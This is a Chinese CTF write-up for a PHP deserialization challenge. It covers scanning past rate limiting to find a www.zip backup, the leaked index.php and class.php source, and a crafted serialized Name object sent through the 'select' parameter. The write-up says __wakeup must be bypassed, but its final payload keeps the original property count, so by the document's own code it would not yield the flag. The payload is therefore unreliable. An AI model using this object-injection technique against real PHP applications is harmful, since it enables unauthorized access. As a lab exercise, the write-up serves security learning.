这题提示有备份文件,如果你直接用dirsearch扫,你会扫出来一堆429和503,因为服务器配置了防扫措施,限制了访问频率
要么手动指定扫描速度,或者你可以换个工具,dirmap,这工具本身扫的就不是非常快
扫出来www.zip,看一看,flag.php,一看就是个假flag
把项目导入到phpstorm中,然后搜索flag关键字,发现在class.php里出现了flag,而class.php是由index.php调用
所以看过代码后简单梳理一下思路
index.php
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
index.php要求我们有一个select参数,值是一个Name对象,下面就是绕过,要想拿到flag,username得是admin,password得是100
且wakeup方法不能被调用
简简单单序列化一下
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a=new Name('admin','100');
echo serialize($a);
?>
运行结果
O:4:"Name":2:{s:14:"不可见字符Name不可见字符username";s:5:"admin";s:14:"不可见字符Name不可见字符password";s:3:"100";}
在url里截断符用%00替换,于是完整的payload
?select=O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
参考视频链接:https://www.bilibili.com/video/BV1Uv411A7gC
3463
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
